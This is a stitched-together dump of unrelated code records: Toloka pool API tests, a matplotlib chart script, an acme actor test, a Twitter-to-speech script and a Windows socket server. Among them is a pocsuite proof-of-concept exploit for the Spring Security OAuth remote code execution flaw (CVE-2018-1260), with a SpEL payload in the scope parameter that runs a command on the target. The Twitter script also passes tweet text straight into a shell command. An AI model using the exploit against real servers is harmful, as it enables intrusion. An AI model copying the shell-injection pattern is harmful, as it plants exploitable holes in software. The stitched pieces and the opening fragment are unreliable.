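        id_gt = page['items'][-1]['id']    # cursor: last id seen so far

pages = [{'items': [{'id': '1'}, {'id': '2'}], 'has_more': True},
         {'items': [{'id': '3'}], 'has_more': False}]
fetch_page = lambda id_gt: pages[0] if id_gt is None else pages[1]
assert [i['id'] for i in fetch_all(fetch_page)] == ['1', '2', '3']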
Link to open in web interface: https://sandbox.toloka.yandex.com/requester/project/10/pool/21'\n )]\n assert pool_map_with_readonly == client.unstructure(result)\n\n\ndef test_create_pool_check_all_filters(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n\n pool_map = {\n **pool_map_with_readonly,\n 'filter': {\n 'and': [\n {\n 'or': [\n {'category': 'profile', 'key': 'gender', 'operator': 'EQ', 'value': 'FEMALE'},\n {'category': 'profile', 'key': 'country', 'operator': 'NE', 'value': 'BE'},\n ],\n },\n {'category': 'profile', 'key': 'citizenship', 'operator': 'EQ', 'value': 'BY'},\n {'category': 'profile', 'key': 'education', 'operator': 'EQ', 'value': 'MIDDLE'},\n {'category': 'profile', 'key': 'adult_allowed', 'operator': 'EQ', 'value': True},\n {'category': 'profile', 'key': 'date_of_birth', 'operator': 'GT', 'value': 604972800},\n {'category': 'profile', 'key': 'city', 'operator': 'NOT_IN', 'value': 225},\n {'category': 'profile', 'key': 'languages', 'operator': 'IN', 'value': 'RU'},\n {\n 'and': [\n {'category': 'computed', 'key': 'region_by_phone', 'operator': 'IN', 'value': 213},\n {'category': 'computed', 'key': 'region_by_ip', 'operator': 'NOT_IN', 'value': 1},\n ]\n },\n {'category': 'computed', 'key': 'device_category', 'operator': 'EQ', 'value': 'PERSONAL_COMPUTER'},\n {'category': 'computed', 'key': 'os_family', 'operator': 'EQ', 'value': 'WINDOWS'},\n {'category': 'computed', 'key': 'os_version', 'operator': 'GTE', 'value': 8.1},\n {'category': 'computed', 'key': 'os_version_major', 'operator': 'GT', 'value': 8},\n {'category': 'computed', 'key': 'os_version_minor', 'operator': 'GTE', 'value': 1},\n {'category': 'computed', 'key': 'os_version_bugfix', 'operator': 'LTE', 'value': 225},\n {'category': 'computed', 'key': 'user_agent_type', 'operator': 'EQ', 'value': 'BROWSER'},\n # {'category': 'computed', 'key': 'user_agent_family', 'operator': 'NE', 'value': 'OPERA'},\n {'category': 'computed', 'key': 'user_agent_version', 'operator': 'LT', 'value': 11.12},\n {'category': 'computed', 'key': 'user_agent_version_major', 'operator': 'LT', 'value': 11},\n {'category': 'computed', 'key': 'user_agent_version_minor', 'operator': 'LT', 'value': 12},\n {'category': 'computed', 'key': 'user_agent_version_bugfix', 'operator': 'GT', 'value': 2026},\n {'category': 'computed', 'key': 'rating', 'operator': 'GTE', 'value': 885.15},\n {\n 'or': [\n {'category': 'skill', 'key': '224', 'operator': 'GTE', 'value': 85},\n {'category': 'skill', 'key': '300', 'operator': 'NE', 'value': None},\n {'category': 'skill', 'key': '350', 'operator': 'EQ', 'value': 75.512},\n ]\n }\n ]\n }\n }\n\n def pools(request, context):\n assert pool_map == request.json()\n return pool_map\n\n requests_mock.post(f'{toloka_url}/pools', json=pools, status_code=201)\n\n import toloka.client.filter as filter\n\n pool = client.structure(pool_map_with_readonly, client.pool.Pool)\n pool.filter = (\n ((filter.Gender == filter.Gender.FEMALE) | (filter.Country != 'BE')) &\n (filter.Citizenship == 'BY') &\n (filter.Education == filter.Education.MIDDLE) &\n (filter.AdultAllowed == True) & # noqa: E712\n (filter.DateOfBirth > 604972800) &\n (filter.City.not_in(225)) &\n (filter.Languages.in_('RU')) &\n (filter.RegionByPhone.in_(213) & filter.RegionByIp.not_in(1)) &\n (filter.DeviceCategory == filter.DeviceCategory.PERSONAL_COMPUTER) &\n (filter.OSFamily == filter.OSFamily.WINDOWS) &\n (filter.OSVersion >= 8.1) &\n (filter.OSVersionMajor > 8) &\n (filter.OSVersionMinor >= 1) &\n (filter.OSVersionBugfix <= 225) 
&\n (filter.UserAgentType == filter.UserAgentType.BROWSER) &\n (filter.UserAgentVersion < 11.12) &\n (filter.UserAgentVersionMajor < 11) &\n (filter.UserAgentVersionMinor < 12) &\n (filter.UserAgentVersionBugfix > 2026) &\n (filter.Rating >= 885.15) &\n ((filter.Skill('224') >= 85) | (filter.Skill('300') != None) | (filter.Skill('350') == 75.512))\n )\n result = toloka_client.create_pool(pool)\n assert client.structure(pool_map, client.pool.Pool) == result\n assert pool_map == client.unstructure(result)\n\n\n@pytest.fixture\ndef pool_map_without_filter(pool_map_with_readonly):\n pool_map_without_filter = pool_map_with_readonly.copy()\n del pool_map_without_filter['filter']\n return pool_map_without_filter\n\n\ndef test_unstructure_pool_check_one_filter_wrap(requests_mock, toloka_client, toloka_url, pool_map_without_filter):\n pool_map = {\n **pool_map_without_filter,\n 'filter': {\n 'and': [\n {'category': 'profile', 'key': 'languages', 'operator': 'IN', 'value': 'EN'},\n ]\n }\n }\n\n def pools(request, context):\n assert pool_map == request.json()\n return pool_map\n\n requests_mock.post(f'{toloka_url}/pools', json=pools, status_code=201)\n\n import toloka.client.filter as filter\n\n pool = client.structure(pool_map_without_filter, client.pool.Pool)\n pool.filter = filter.Languages.in_('EN')\n result = toloka_client.create_pool(pool)\n assert client.structure(pool_map, client.pool.Pool) == result\n assert pool_map == client.unstructure(result)\n\n\ndef test_unstructure_pool_filter_after_init():\n import toloka.client.filter as filter\n\n pool = client.pool.Pool(\n project_id=42,\n private_name='Pool 1',\n may_contain_adult_content=False,\n reward_per_assignment=1000.01,\n assignment_max_duration_seconds=10,\n defaults=client.pool.Pool.Defaults(default_overlap_for_new_task_suites=1),\n # we testing just this:\n filter=filter.Languages.in_('EN')\n )\n\n filter_map = {\n 'and': [\n {'category': 'profile', 'key': 'languages', 'operator': 'IN', 'value': 'EN'},\n ]\n }\n\n unstructed_pool = client.unstructure(pool)\n assert 'filter' in unstructed_pool\n assert filter_map == unstructed_pool['filter']\n\n\ndef test_update_pool(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n updated_pool = {\n **pool_map_with_readonly,\n 'private_name': 'updated name',\n 'private_comment': 'updated comment',\n }\n\n def pools(request, context):\n assert updated_pool == request.json()\n return updated_pool\n\n requests_mock.put(f'{toloka_url}/pools/21', json=pools)\n result = toloka_client.update_pool('21', client.structure(updated_pool, client.pool.Pool))\n assert updated_pool == client.unstructure(result)\n\n\ndef test_patch_pool(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n raw_result = {**pool_map_with_readonly, 'priority': 42}\n\n def pools(request, context):\n assert {'priority': 42} == request.json()\n return raw_result\n\n requests_mock.patch(f'{toloka_url}/pools/21', json=pools)\n\n # Request object syntax\n result = toloka_client.patch_pool('21', client.pool.PoolPatchRequest(priority=42))\n assert raw_result == client.unstructure(result)\n\n # Expanded syntax\n result = toloka_client.patch_pool('21', priority=42)\n assert raw_result == client.unstructure(result)\n\n\n@pytest.fixture\ndef open_pool_operation_map():\n return {\n 'id': 'open-pool-op1id',\n 'type': 'POOL.OPEN',\n 'status': 'RUNNING',\n 'submitted': '2016-03-07T15:47:00',\n 'started': '2016-03-07T15:47:21',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef 
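The operation-map fixtures that follow all use the same layering pattern: a "complete" map is the base map re-spread with a couple of overridden keys. Distilled into a self-contained pytest sketch (the names here are invented):

import pytest

@pytest.fixture
def base_op():
    return {'id': 'op1', 'status': 'RUNNING'}

@pytest.fixture
def complete_op(base_op):
    # dict unpacking keeps the base keys and overrides/extends the rest
    return {**base_op, 'status': 'SUCCESS', 'finished': '2016-03-07T15:48:03'}

def test_layering(complete_op):
    assert complete_op['id'] == 'op1' and complete_op['status'] == 'SUCCESS'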
complete_open_pool_operation_map(open_pool_operation_map):\n return {\n **open_pool_operation_map,\n 'status': 'SUCCESS',\n 'finished': '2016-03-07T15:48:03',\n }\n\n\ndef test_open_pool_async(requests_mock, toloka_client, toloka_url, open_pool_operation_map, complete_open_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/open', json=open_pool_operation_map, status_code=202)\n requests_mock.get(f'{toloka_url}/operations/{open_pool_operation_map[\"id\"]}', json=complete_open_pool_operation_map, status_code=200)\n\n operation = toloka_client.open_pool_async('21')\n assert open_pool_operation_map == client.unstructure(operation)\n\n complete_operation = toloka_client.wait_operation(operation)\n assert complete_open_pool_operation_map == client.unstructure(complete_operation)\n\n\ndef test_open_pool(requests_mock, toloka_client, toloka_url,\n open_pool_operation_map, complete_open_pool_operation_map, pool_map_with_readonly):\n requests_mock.post(f'{toloka_url}/pools/21/open', json=open_pool_operation_map, status_code=202)\n requests_mock.get(f'{toloka_url}/operations/{open_pool_operation_map[\"id\"]}', json=complete_open_pool_operation_map, status_code=200)\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.open_pool('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.mark.xfail(reason='Pseudo operations are not supported yet')\ndef test_open_pool_already_open(requests_mock, toloka_client, toloka_url):\n requests_mock.post(f'{toloka_url}/pools/21/open', [{'status_code': 204}])\n result = toloka_client.wait_operation(toloka_client.open_pool_async('21'))\n result.is_completed()\n result.is_pseudo()\n\n\n@pytest.fixture\ndef close_pool_operation_map():\n return {\n 'id': 'close-pool-op1id',\n 'type': 'POOL.CLOSE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_close_pool_operation_map(close_pool_operation_map):\n return {\n **close_pool_operation_map,\n 'status': 'SUCCESS',\n }\n\n\ndef test_close_pool_async(requests_mock, toloka_client, toloka_url, complete_close_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/close', json=complete_close_pool_operation_map, status_code=202)\n result = toloka_client.wait_operation(toloka_client.close_pool_async('21'))\n assert complete_close_pool_operation_map == client.unstructure(result)\n\n\ndef test_close_pool(requests_mock, toloka_client, toloka_url,\n close_pool_operation_map, complete_close_pool_operation_map, pool_map_with_readonly):\n requests_mock.post(f'{toloka_url}/pools/21/close', json=close_pool_operation_map, status_code=202)\n requests_mock.get(f'{toloka_url}/operations/{close_pool_operation_map[\"id\"]}', json=complete_close_pool_operation_map, status_code=200)\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.close_pool('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.fixture\ndef close_for_update_pool_operation_map():\n return {\n 'id': 'close-pool-for-update-op1id',\n 'type': 'POOL.CLOSE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef 
complete_close_for_update_pool_operation_map(close_for_update_pool_operation_map):\n return {\n **close_for_update_pool_operation_map,\n 'status': 'SUCCESS',\n }\n\n\ndef test_close_pool_for_update_async(requests_mock, toloka_client, toloka_url,\n complete_close_for_update_pool_operation_map):\n requests_mock.post(\n f'{toloka_url}/pools/21/close-for-update',\n json=complete_close_for_update_pool_operation_map,\n status_code=202\n )\n result = toloka_client.wait_operation(toloka_client.close_pool_for_update_async('21'))\n assert complete_close_for_update_pool_operation_map == client.unstructure(result)\n\n\ndef test_close_pool_for_update(requests_mock, toloka_client, toloka_url,\n close_for_update_pool_operation_map, complete_close_for_update_pool_operation_map,\n pool_map_with_readonly):\n requests_mock.post(\n f'{toloka_url}/pools/21/close-for-update',\n json=close_for_update_pool_operation_map,\n status_code=202\n )\n requests_mock.get(\n f'{toloka_url}/operations/{close_for_update_pool_operation_map[\"id\"]}',\n json=complete_close_for_update_pool_operation_map,\n status_code=200\n )\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.close_pool_for_update('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.fixture\ndef archive_pool_operation_map():\n return {\n 'id': 'archive-pool-op1id',\n 'type': 'POOL.ARCHIVE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_archive_pool_operation_map(archive_pool_operation_map):\n return {\n **archive_pool_operation_map,\n 'status': 'SUCCESS',\n }\n\n\ndef test_archive_pool_async(requests_mock, toloka_client, toloka_url, complete_archive_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/archive', json=complete_archive_pool_operation_map, status_code=202)\n result = toloka_client.wait_operation(toloka_client.archive_pool_async('21'))\n assert complete_archive_pool_operation_map == client.unstructure(result)\n\n\ndef test_archive_pool(requests_mock, toloka_client, toloka_url,\n archive_pool_operation_map, complete_archive_pool_operation_map, pool_map_with_readonly):\n requests_mock.post(f'{toloka_url}/pools/21/archive', json=archive_pool_operation_map, status_code=202)\n requests_mock.get(\n f'{toloka_url}/operations/{archive_pool_operation_map[\"id\"]}',\n json=complete_archive_pool_operation_map,\n status_code=200\n )\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.archive_pool('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.fixture\ndef clone_pool_operation_map():\n return {\n 'id': 'archive-pool-op1id',\n 'type': 'POOL.CLONE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_clone_pool_operation_map(clone_pool_operation_map):\n return {\n **clone_pool_operation_map,\n 'status': 'SUCCESS',\n 'details': {'pool_id': '22'},\n }\n\n\n@pytest.fixture\ndef cloned_pool_map(pool_map_with_readonly):\n return {\n **pool_map_with_readonly,\n 'id': '22',\n }\n\n\ndef test_clone_pool_async(requests_mock, toloka_client, toloka_url, complete_clone_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/clone', 
json=complete_clone_pool_operation_map, status_code=202)\n result = toloka_client.wait_operation(toloka_client.clone_pool_async('21'))\n assert complete_clone_pool_operation_map == client.unstructure(result)\n\n\ndef test_clone_pool(requests_mock, toloka_client, toloka_url,\n clone_pool_operation_map, complete_clone_pool_operation_map, cloned_pool_map, caplog):\n requests_mock.post(f'{toloka_url}/pools/21/clone', json=clone_pool_operation_map, status_code=202)\n requests_mock.get(\n f'{toloka_url}/operations/{clone_pool_operation_map[\"id\"]}',\n json=complete_clone_pool_operation_map,\n status_code=200\n )\n requests_mock.get(f'{toloka_url}/pools/22', json=cloned_pool_map, status_code=200)\n\n with caplog.at_level(logging.INFO):\n caplog.clear()\n result = toloka_client.clone_pool('21')\n assert caplog.record_tuples == [(\n 'toloka.client',\n logging.INFO,\n 'A new pool with ID \"22\" has been cloned. Link to open in web interface: https://sandbox.toloka.yandex.com/requester/project/10/pool/22'\n )]\n assert cloned_pool_map == client.unstructure(result)\n","sub_path":"tests/pool/test_pool.py","file_name":"test_pool.py","file_ext":"py","file_size_in_byte":20586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"377155861","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\nimport numpy as np\n\ndef bar_charts():\n plt.style.use('seaborn')\n\n labels = ['DSC (original)', 'MLP100', 'MLP20', 'MLPLinear']\n values = np.array([0.899, 0.900, 0.855, 0.505]) - 0.5\n vlabels = ['0.899', '0.900', '0.855', '0.505']\n\n use_inverse_ws = True\n if not use_inverse_ws:\n nweights = [0.5, 1/400, 1/2000, 1/2000]\n wlabels = ['20,000', '100', '20', '20']\n else:\n # progression to arrive at the final numbers\n # 1/20000, 1/100, 1/20, 1/20\n # 1/1000, 1/5, 1, 1 -- scale to 1\n # 1/2000, 1/10, 0.5, 0.5 -- scale to 0.5\n nweights = [1/2000, 1/10, 0.5, 0.5]\n wlabels = ['1/20,000', '1/100', '1/20', '1/20']\n\n x = np.arange(len(labels)) # the label locations\n width = 0.35 # the width of the bars\n width2 = 0.2\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - width / 2, values, width, label='AUC')\n rects2 = ax.bar(x + width2 / 2, nweights, width2, label='Inverse number of weights')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n # ax.set_ylabel('Scores')\n # plt.yticks([], [])\n # ax.set_yticks([], minor=True)\n # plt.yticks([])\n # ax.axes.get_yaxis().set_visible(False)\n yticks = [item.get_text() for item in ax.get_yticklabels()]\n\n ax.set_yticklabels(['']*len(yticks))\n ax.set_title('AUC and inverse number of weights by model')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n def autolabel(rects, labels=None):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for i, rect in enumerate(rects):\n label = labels[i] if labels else rect.get_height()\n height = rect.get_height()\n if label == '1/20,000': continue\n ax.annotate(f'{label}',\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n autolabel(rects1, vlabels)\n autolabel(rects2, wlabels)\n dscwrect = rects2[0]\n dscwrect_height = dscwrect.get_height()\n ax.annotate(f'1/20,000',\n xy=(dscwrect.get_x() + dscwrect.get_width()-0.05, dscwrect_height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n # values = [0.899, 1, 0.900, 1/200, 
0.855, 1/1000, 0.498, 1/1000]\n # xs = range(4)\n # labels = ['DSC (original)', 'MLP100', 'MLP20', 'MLPLinear']\n # plt.bar(xs, values)#, tick_label=labels)\n # plt.xticks(xs, labels)\n fig.tight_layout()\n plt.savefig('dsc_funeral_barchart.png', dpi=300, bbox_inches='tight')\n plt.show()\n\nif __name__ == '__main__':\n bar_charts()","sub_path":"visualizations/ch5-results/funeral_visualizations.py","file_name":"funeral_visualizations.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251380967","text":"# python3\n# Copyright 2018 DeepMind Technologies Limited. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for actors_jax.\"\"\"\n\nfrom absl.testing import absltest\n\nfrom acme import environment_loop\nfrom acme import specs\nfrom acme.agents import actors_jax\nfrom acme.testing import fakes\nfrom acme.utils import jax_utils\nfrom acme.utils import jax_variable_utils\n\nimport dm_env\nimport haiku as hk\nimport jax.numpy as jnp\nimport numpy as np\n\n\ndef _make_fake_env() -> dm_env.Environment:\n env_spec = specs.EnvironmentSpec(\n observations=specs.Array(shape=(10, 5), dtype=np.float32),\n actions=specs.DiscreteArray(num_values=3),\n rewards=specs.Array(shape=(), dtype=np.float32),\n discounts=specs.BoundedArray(\n shape=(), dtype=np.float32, minimum=0., maximum=1.),\n )\n return fakes.Environment(env_spec, episode_length=10)\n\n\nclass ActorTest(absltest.TestCase):\n\n def test_feedforward(self):\n environment = _make_fake_env()\n env_spec = specs.make_environment_spec(environment)\n\n def policy(inputs: jnp.ndarray):\n return hk.Sequential([\n hk.Flatten(),\n hk.Linear(env_spec.actions.num_values),\n lambda x: jnp.argmax(x, axis=-1),\n ])(\n inputs)\n\n policy = hk.transform(policy, apply_rng=True)\n\n rng = hk.PRNGSequence(1)\n dummy_obs = jax_utils.add_batch_dim(\n jax_utils.zeros_like(env_spec.observations))\n params = policy.init(next(rng), dummy_obs)\n\n variable_source = fakes.VariableSource(params)\n variable_client = jax_variable_utils.VariableClient(variable_source,\n 'policy')\n\n actor = actors_jax.FeedForwardActor(\n policy.apply, rng=hk.PRNGSequence(1), variable_client=variable_client)\n\n loop = environment_loop.EnvironmentLoop(environment, actor)\n loop.run(20)\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"acme/agents/actors_jax_test.py","file_name":"actors_jax_test.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22937891","text":"#!/home/ludflu/project/tweet-talk/tt-python/bin/python\n\nimport twitter\nimport os\n\niconsumer_key = 'XX'\niconsumer_secret = 'XX'\niaccess_token = 'XX'\niaccess_token_secret ='XX'\n\napi = twitter.Api(consumer_key=iconsumer_key,\n consumer_secret=iconsumer_secret,\n access_token_key=iaccess_token,\n access_token_secret=iaccess_token_secret)\n\nstatuses = api.GetUserTimeline('ludflu')\n\ns= 
statuses[0]\n\ntweet = 'echo \"' + s.text + '\" | festival --tts'\nos.system( tweet )\n\n","sub_path":"tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"652876117","text":"# -*- coding: utf-8 -*-\n'''\nurl:https://kexue.fm/archives/3863\nword embedding test\nOn a GTX960, one epoch takes about 18s\nAfter 30 epochs, training accuracy is 98.41% and test accuracy is 89.03%\nDo not use too much Dropout, otherwise the information loss is too severe\n'''\n\nimport numpy as np\nimport pandas as pd\nimport jieba\n\npos = pd.read_excel('./pos.xls', header=None)\npos['label'] = 1\nneg = pd.read_excel('neg.xls', header=None)\nneg['label'] = 0\nall_ = pos.append(neg, ignore_index=True)\nall_['words'] = all_[0].apply(lambda s: list(jieba.cut(s))) # run jieba word segmentation\nprint(all_[\"words\"][0:2])\n\nmaxlen = 100 # truncation length in words\nmin_count = 5 # discard words occurring fewer times than this; the simplest form of dimensionality reduction\n\ncontent = []\n# merge all jieba segmentation results into one list\nfor i in all_['words']:\n\tcontent.extend(i)\n\n# count the occurrences of each value in the merged list; the resulting Series has two parts:\n# the word as index and the word count as values\nabc = pd.Series(content).value_counts()\n# filter out entries whose count is below the threshold\nabc = abc[abc >= min_count]\n# rank the filtered words by frequency: the most frequent becomes 1, the second 2, ...\nabc[:] = list(range(1, len(abc)+1))\n# add the empty string, used as padding when truncating to maxlen\nabc[''] = 0\nword_set = set(abc.index)\n\ndef doc2num(s, maxlen):\n s = [i for i in s if i in word_set]\n # drop words occurring fewer than 5 times and normalize to the truncation length (pad with '' when short)\n # e.g. [1, 2, '', '']\n s = s[:maxlen] + ['']*max(0, maxlen-len(s))\n # index by word and return that word's rank id\n return list(abc[s])\n\nall_['doc2num'] = all_['words'].apply(lambda s: doc2num(s, maxlen))\nprint(all_['doc2num'][0:2])\n\n# shuffle the data manually\n#print(all_['doc2num'][0:10])\nidx = list(range(len(all_)))\nnp.random.shuffle(idx)\n# loc selects rows by label\nall_ = all_.loc[idx]\n#print(all_['doc2num'][0:10])\n\n# build the arrays in the shape keras expects\nx = np.array(list(all_['doc2num']))\nprint(x[0:2])\ny = np.array(list(all_['label']))\n# reshape the labels from a 1-D array to a 2-D array: [0 1 0 1] -> [[0] [1] [0] [1]]\n# with -1, reshape infers the remaining dimension from the other shape argument\ny = y.reshape((-1, 1))\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Embedding\nfrom keras.layers import LSTM\n\n# build the model\nmodel = Sequential()\n# How the Embedding layer relates to word2vec: https://blog.csdn.net/jiangpeng59/article/details/77533309\n# Input shape: a 2D tensor of shape (samples, sequence_length), i.e. batch_size samples of input_length words each\n# Output shape: a 3D tensor of shape (samples, sequence_length, output_dim), i.e. batch_size samples, each a 2D tensor\n# with one dimension for the words and the other for that word's Embedding features.\nmodel.add(Embedding(len(abc), 256, input_length=maxlen))\n# LSTM parameters explained, with a diagram: https://blog.csdn.net/jiangpeng59/article/details/77646186\n# Many LSTM layers can be chained, but the last LSTM layer usually has return_sequences=False.\n# Input: a 3D tensor of shape (samples, timesteps, input_dim)\n# If return_sequences=True: returns a 3D tensor of shape (samples, timesteps, output_dim)\n# Otherwise: returns a 2D tensor of shape (samples, output_dim)\nmodel.add(LSTM(128))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\nprint(\"flattened list of the model's network layers\")\nprint(model.layers)\nprint(\"list of the model's input tensors\")\nprint(model.inputs)\nprint(\"list of the model's output tensors\")\nprint(model.outputs)\nprint(\"model summary\")\nmodel.summary()\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n\nbatch_size = 128\ntrain_num = 15000\n\n# verbose defaults to 1 and prints debug information during training; set verbose = 0 to turn it off.\nmodel.fit(x[:train_num], y[:train_num], batch_size = batch_size, epochs=30, verbose=1)\n\nmodel.evaluate(x[train_num:], y[train_num:], batch_size = batch_size)\n\ndef predict_one(s): # prediction function for a single sentence\n s = np.array(doc2num(list(jieba.cut(s)), maxlen))\n s = s.reshape((1, s.shape[0]))\n return model.predict_classes(s, 
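The vocabulary construction in word_embedding.py, distilled on a toy token list (values invented):

import pandas as pd

tokens = ['good', 'bad', 'good', 'good', 'movie', 'bad']
vocab = pd.Series(tokens).value_counts()       # counts, already sorted descending
vocab = vocab[vocab >= 2]                      # drop rare words (min_count)
vocab[:] = list(range(1, len(vocab) + 1))      # replace counts by rank ids
vocab[''] = 0                                  # padding token
# vocab is now {'good': 1, 'bad': 2, '': 0}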
verbose=0)[0][0]","sub_path":"EmoClassification/word_embedding.py","file_name":"word_embedding.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"342694607","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pocsuite.api.request import req # usage is identical to requests\nfrom pocsuite.api.poc import register\nfrom pocsuite.api.poc import Output, POCBase\nheaders = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml'}\npoc_str = '''oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com/chybeta&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22calc.exe%22%29%7D'''\ndef poc(url):\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n if \"/\" in url:\n url += poc_str\n try:\n res = req.get(url, verify=False, timeout=5, headers=headers)\n response = res.text\n except Exception:\n response = \"\"\n return response\n\nclass TestPOC(POCBase):\n name = 'spring_security_oauth_RCE-2018-1260'\n vulID = 'CVE-2018-1260' #https://www.seebug.org/vuldb/ssvid-97287\n author = ['debug']\n vulType = 'RCE' \n version = '1.0' # default version: 1.0\n references = ['https://www.codercto.com/a/20129.html']\n desc = '''\n\t\t Spring Security OAuth versions 2.3 prior to 2.3.3, 2.2 prior to 2.2.2, 2.1 prior to 2.1.2, 2.0 prior to 2.0.15,\n as well as older unsupported versions, contain a remote code execution vulnerability. A malicious user or attacker\n can craft an authorization request to the authorization endpoint that can lead to remote code execution when the\n resource owner is forwarded to the approval endpoint.\n\t\t '''\n vulDate = '2020-02-10'\n createDate = '2020-02-10'\n updateDate = '2020-02-13'\n appName = 'Spring Security OAuth'\n appVersion = '2.3 to 2.3.3,2.2 to 2.2.2,2.0 to 2.0.152.1 to 2.1.2'\n appPowerLink = ''\n samples = ['']\n \n def _attack(self):\n '''attack mode'''\n return self._verify()\n\n def _verify(self):\n '''verify mode'''\n result={}\n response = poc(self.url)\n if 'Login with Username and Password' in response:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url+ 'Spring Security Oauth_RCE-2018-1260' + ' exists!'\n return self.parse_output(result)\n \n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('Internet nothing returned')\n return output\nregister(TestPOC)\n","sub_path":"_pocs/muti/pocs4scan/Spring/Spring_Security_Oauth_RCE-2018-1260.py","file_name":"Spring_Security_Oauth_RCE-2018-1260.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"249444121","text":"#coding:utf-8\nimport os\nimport socket\nfrom win32com.client import Dispatch\nimport random\nimport platform\nimport signal\nimport sys\nimport time\n\nclass server():\n\n pidfile = \"\"\n port = 9999\n\n\n def __init__(self):\n self.pidfile = os.path.dirname(__file__)+\"/pidfile.pid\"\n\n # start the service\n def start_server(self):\n print('ready to start models...')\n\n # write the pid\n pid = os.getpid()\n f = open(self.pidfile,'w')\n f.write(str(pid))\n f.close()\n\n # start matlab\n matlab = Dispatch('Matlab.application')\n\n # create the socket\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #host = socket.gethostname()\n host = \"0.0.0.0\"\n\n serversocket.bind((host,self.port))\n serversocket.listen(4)\n\n print('service started')\n while True:\n clientsocket, addr = serversocket.accept()\n\n clientsocket.close()\n\n\n # stop the service\n def stop_server(self):\n\n osname = platform.system().lower()\n\n f = open(self.pidfile, 'r')\n pid = f.read()\n\n try:\n\n if osname == 'windows':\n print('killing ps')\n os.popen('taskkill.exe /pid:' + pid + \" 
